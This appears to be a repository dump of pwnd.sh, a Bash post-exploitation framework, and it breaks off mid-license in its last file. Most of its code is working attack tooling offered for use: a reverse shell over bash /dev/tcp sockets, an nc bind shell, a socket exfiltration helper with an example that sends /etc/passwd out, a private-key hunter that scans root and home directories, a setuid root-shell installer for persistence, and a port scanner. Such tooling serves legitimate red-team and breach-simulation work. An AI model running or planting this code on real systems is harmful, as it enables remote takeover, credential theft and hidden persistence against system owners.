Repository: SafeBreach-Labs/pwndsh Branch: master Commit: 1239754a8dfd Files: 12 Total size: 44.3 KB Directory structure: gitextract_ydkfa3ea/ ├── LICENSE ├── README.rst ├── bin/ │ ├── compile_pwnd_sh.sh │ └── pwnd.sh └── pwnd/ ├── _bootstrap.bash ├── _pwnd.bash ├── assets/ │ └── priv_keys.bash ├── c2/ │ ├── bindshell.bash │ └── reverseshell.bash ├── exfiltration/ │ └── over_socket.bash ├── persistence/ │ └── rootshell.bash └── reconnaissance/ └── portscanner.bash ================================================ FILE CONTENTS ================================================ ================================================ FILE: LICENSE ================================================ Copyright (c) 2016, SafeBreach All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ================================================ FILE: README.rst ================================================ PWND.SH ======= pwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. It aims to be cross-platform (Linux, Mac OS X, Solaris etc.) and with little to no external dependencies. Slides from SkyDogCon 2016 are `available here `_ Install: -------- .. code:: $ cd bin/ $ ./compile_pwnd_sh.sh This will generate a file called ``pwnd.sh`` .. code:: $ ls -la pwnd.sh -rw-r--r--@ 1 ikotler staff 7823 Oct 19 16:55 pwnd.sh Now let's get pwnd! .. code:: $ source pwnd.sh Pwnd v1.0.0, Itzik Kotler (@itzikkotler)] Type `help' to display all the pwnd commands. Type `help name' to find out more about the pwnd command `name'. (pwnd)$ Tested: ------- * Mac OS X El Captian (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15) * Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu) * Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11) Features/Bugs: -------------- Found a bug? Have a good idea for improving PWND.SH? Head over to `PWND.SH's github `_ page and create a new ticket or fork. If you want to contact us please email: labs (at) safebreach (dot) com. License: -------- BSD 3-Clause ================================================ FILE: bin/compile_pwnd_sh.sh ================================================ #!/usr/bin/env bash ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### ########## # Consts # ########## DEFAULT_OUTPUT_FILENAME="pwnd.sh" ############# # Functions # ############# normalize_and_append() { grep -v "^#" < "$1" >> "$2" echo " " >> "$2" } ############### # Entry Point # ############### output_filename="$DEFAULT_OUTPUT_FILENAME" if [ ! -z "${1-}" ]; then output_filename="$1" fi # Start with a shebang line echo "#!/usr/bin/env bash"> "$output_filename" normalize_and_append "../pwnd/_pwnd.bash" "$output_filename" for module in $(find ../pwnd -type f -name "[a-zA-Z0-9]*.bash"); do normalize_and_append "$module" "$output_filename" done normalize_and_append "../pwnd/_bootstrap.bash" "$output_filename" ls -la "$output_filename" ================================================ FILE: bin/pwnd.sh ================================================ #!/usr/bin/env bash IFS=$' \t\n' PWND_VERSION="1.0.0" _pwnd_commands=() pwnd_register_cmd() { _pwnd_commands+=("$1;$2") } pwnd_isroot() { local retval=0 if [ $EUID -ne 0 ]; then echo "You must be a root user" retval=1 fi return $retval } __hunt_privkeys_usage() { cat << "EOF" usage: __hunt_privkeys [dir ...] Find all private keys that are textaully encoded. Each DIR argument will be recursively searched. Default directories are: `~root' and `dirname $HOME' EOF return 0 } hunt_privkeys() { local dirs if [ $# -eq 0 ]; then dirs=(~root "$(dirname $HOME)") else dirs=("$@") fi for directory in "${dirs[@]}"; do echo "Scanning $directory ..." grep -ril "PRIVATE KEY" "$directory" 2> /dev/null done echo "Done!" } pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded" __bindshell_usage() { cat << "EOF" usage: bindshell port [arg ...] A simple yet "cross platform" implementation of bindshell using nc, mkfifo and bash. PORT is a TCP (by default) port number. Each ARG will be passed directly to nc EOF return 0 } bindshell() { if [ -z "${1-}" ]; then __bindshell_usage return 0 fi local tempfile=$(mktemp -u) local port="$1" mkfifo "$tempfile" bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile" } pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash" __reverseshell_usage() { cat << "EOF" usage: reverseshell [-u] host port A simple yet "cross platform" implementation of reverseshell using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default) port number. The `-u' if specified says use UDP instead of the default option of TCP. EOF return 0 } reverseshell() { local host proto port if [ "${1-}" == "-u" ]; then if [ -z "${3-}" ]; then __reverseshell_usage return 0 fi host="$2" proto="udp" port="$3" else if [ -z "${2-}" ]; then __reverseshell_usage return 0 fi proto="tcp" port="$2" host="$1" fi bash -i >& "/dev/$proto/$host/$port" 0>&1 } pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets" __over_socket_usage() { cat << "EOF" usage: over_socket [-u] host port A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default) port number. The `-u' if specified says use UDP instead of the default option of TCP. Example: $ cat /etc/passwd | over_socket localhost 80 This will open connection to localhost at port 80 TCP and will send over the content of `/etc/passwd' EOF return 0 } over_socket() { local host proto port if [ "${1-}" == "-u" ]; then if [ -z "${3-}" ]; then __over_socket_usage return 0 fi host="$2" proto="udp" port="$3" else if [ -z "${2-}" ]; then __over_socket_usage return 0 fi proto="tcp" port="$2" host="$1" fi cat /dev/stdin > "/dev/$proto/$host/$port" } pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets" __install_rootshell_usage() { cat << "EOF" usage: install_rootshell [/path/to/shell] [/path/to/rootshell] A simple yet "cross platform" implementation of rootshell using chmod and bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL is path to where to install the rootshell (default: mktemp -u) EOF return 0 } install_rootshell() { pwnd_isroot || return 1 local shellfile=${1-$SHELL} local rootshell=${2-$(mktemp -u)} cp "$shellfile" "$rootshell" chmod u+s "$rootshell" ls -la "$rootshell" } pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash" __portscanner_usage() { cat << "EOF" usage: portscanner host [port/proto ...], [port-range/proto ...]> A simple yet "cross platform" implementation of portscanner using bash sockets. HOST can be IPv4 address or hostname. PORT can be any port number. PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is any range between 1 to 65535 following `/tcp' or `/udp' postfix. Examples: $ portscanner localhost 80/tcp This will check if TCP port 80 is open on localhost. $ portscanner localhost 53/tcp,53/udp This will check if TCP port 53 and UDP port 53 are opened on localhost. $ portscanner localhost 1-1024/tcp,69/udp This will check if TCP ports 1 to 1024 are opened and if UDP port 69 is opened on localhost. EOF return 0 } __portscanner_timeout() { # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time `perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"` # `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process } portscanner() { if [ -z "${2-}" ]; then __portscanner_usage return fi local host="$1" local ports=() local csv_args=() IFS=',' read -ra csv_args <<< "${@:2}" for arg in "${csv_args[@]}"; do case "$arg" in *-*) # i.e. 1-1024/tc local range_ports=() IFS='/' read -ra range_ports <<< "$arg" IFS='-' read start end <<< "${range_ports[0]}" for ((port=start; port <= end; port++)); do ports+=("$port/${range_ports[1]}") done ;; *,*) # i.e. '53/tcp, 53/udp' IFS=',' read -ra ports <<< "$arg" ;; *) # i.e. '80/tcp' ports+=("$arg") ;; esac done for port in "${ports[@]}"; do local conn_parameter=() IFS='/' read -ra conn_parameter <<< "$port" __portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" && echo "port $port is open" || echo "port $port is closed" done } pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets" __bash_help_usage() { echo "Execute bash builtin help and pass any argument to it" } bash_help() { local help_topic="" if [ ! -z "${1-}" ]; then help_topic="$1" fi bash -c "help $help_topic" } __help_usage() { cat << "EOF" usage: pwnd-help Display helpful information about pwnd commands. If NAME is specified, gives detailed help on command NAME, otherwise a list of the pwnd commands is printed. To access bash builtin help use: `bash_help' EOF return 0 } help() { if [ ! -z "${1-}" ]; then eval "__$1_usage" 2> /dev/null if [ $? == 127 ]; then echo "pwnd-help: no help topics match \`$1'. Try \`help' to see all the defined commands" return 127 fi else cat << EOF pwnd, version ${PWND_VERSION} (${MACHTYPE}) These pwnd commands are defined internally. Type \`help' to see this list. Type \`help name' to find out more about the pwnd command \`name'. EOF for pwnd_command in "${_pwnd_commands[@]-}"; do IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command" # IFS=';' pwnd_cmd_parameters=($pwnd_command) printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}" done fi } cat << EOF [Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]" Type \`help' to display all the pwnd commands. Type \`help name' to find out more about the pwnd command \`name'. EOF PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}" ================================================ FILE: pwnd/_bootstrap.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # _bootstrap.sh, interactive pwnd shell __bash_help_usage() { echo "Execute bash builtin help and pass any argument to it" } bash_help() { local help_topic="" if [ ! -z "${1-}" ]; then help_topic="$1" fi bash -c "help $help_topic" } __help_usage() { cat << "EOF" usage: pwnd-help Display helpful information about pwnd commands. If NAME is specified, gives detailed help on command NAME, otherwise a list of the pwnd commands is printed. To access bash builtin help use: `bash_help' EOF return 0 } help() { if [ ! -z "${1-}" ]; then eval "__$1_usage" 2> /dev/null if [ $? == 127 ]; then echo "pwnd-help: no help topics match \`$1'. Try \`help' to see all the defined commands" return 127 fi else cat << EOF pwnd, version ${PWND_VERSION} (${MACHTYPE}) These pwnd commands are defined internally. Type \`help' to see this list. Type \`help name' to find out more about the pwnd command \`name'. EOF for pwnd_command in "${_pwnd_commands[@]-}"; do IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command" # IFS=';' pwnd_cmd_parameters=($pwnd_command) printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}" done fi } ############### # Entry Point # ############### cat << EOF [Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]" Type \`help' to display all the pwnd commands. Type \`help name' to find out more about the pwnd command \`name'. EOF PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}" ================================================ FILE: pwnd/_pwnd.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### IFS=$' \t\n' ########## # Consts # ########## PWND_VERSION="1.0.0" #################### # Global variables # #################### _pwnd_commands=() ############# # Functions # ############# pwnd_register_cmd() { _pwnd_commands+=("$1;$2") } pwnd_isroot() { local retval=0 if [ $EUID -ne 0 ]; then echo "You must be a root user" retval=1 fi return $retval } ================================================ FILE: pwnd/assets/priv_keys.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # priv_keys, Find all private keys that are textually encoded __hunt_privkeys_usage() { cat << "EOF" usage: __hunt_privkeys [dir ...] Find all private keys that are textaully encoded. Each DIR argument will be recursively searched. Default directories are: `~root' and `dirname $HOME' EOF return 0 } hunt_privkeys() { local dirs if [ $# -eq 0 ]; then dirs=(~root "$(dirname $HOME)") else dirs=("$@") fi for directory in "${dirs[@]}"; do echo "Scanning $directory ..." grep -ril "PRIVATE KEY" "$directory" 2> /dev/null done echo "Done!" } pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded" ================================================ FILE: pwnd/c2/bindshell.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # bindshell, A simple yet "cross platform" implementation of bindshell using nc, mkfifo and /bin/bash __bindshell_usage() { cat << "EOF" usage: bindshell port [arg ...] A simple yet "cross platform" implementation of bindshell using nc, mkfifo and bash. PORT is a TCP (by default) port number. Each ARG will be passed directly to nc EOF return 0 } bindshell() { if [ -z "${1-}" ]; then __bindshell_usage return 0 fi local tempfile=$(mktemp -u) local port="$1" mkfifo "$tempfile" bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile" } pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash" ================================================ FILE: pwnd/c2/reverseshell.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # reverseshell, A simple yet "cross platform" implementation of reverseshell using bash sockets __reverseshell_usage() { cat << "EOF" usage: reverseshell [-u] host port A simple yet "cross platform" implementation of reverseshell using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default) port number. The `-u' if specified says use UDP instead of the default option of TCP. EOF return 0 } reverseshell() { local host proto port if [ "${1-}" == "-u" ]; then if [ -z "${3-}" ]; then __reverseshell_usage return 0 fi host="$2" proto="udp" port="$3" else if [ -z "${2-}" ]; then __reverseshell_usage return 0 fi proto="tcp" port="$2" host="$1" fi bash -i >& "/dev/$proto/$host/$port" 0>&1 } pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets" ================================================ FILE: pwnd/exfiltration/over_socket.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # over_socket, A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets __over_socket_usage() { cat << "EOF" usage: over_socket [-u] host port A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default) port number. The `-u' if specified says use UDP instead of the default option of TCP. Example: $ cat /etc/passwd | over_socket localhost 80 This will open connection to localhost at port 80 TCP and will send over the content of `/etc/passwd' EOF return 0 } over_socket() { local host proto port if [ "${1-}" == "-u" ]; then if [ -z "${3-}" ]; then __over_socket_usage return 0 fi host="$2" proto="udp" port="$3" else if [ -z "${2-}" ]; then __over_socket_usage return 0 fi proto="tcp" port="$2" host="$1" fi cat /dev/stdin > "/dev/$proto/$host/$port" } pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets" ================================================ FILE: pwnd/persistence/rootshell.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # rootshell, A simple yet "cross platform" implementation of rootshell using `chmod u+s' and bash __install_rootshell_usage() { cat << "EOF" usage: install_rootshell [/path/to/shell] [/path/to/rootshell] A simple yet "cross platform" implementation of rootshell using chmod and bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL is path to where to install the rootshell (default: mktemp -u) EOF return 0 } install_rootshell() { pwnd_isroot || return 1 local shellfile=${1-$SHELL} local rootshell=${2-$(mktemp -u)} cp "$shellfile" "$rootshell" chmod u+s "$rootshell" ls -la "$rootshell" } pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash" ================================================ FILE: pwnd/reconnaissance/portscanner.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 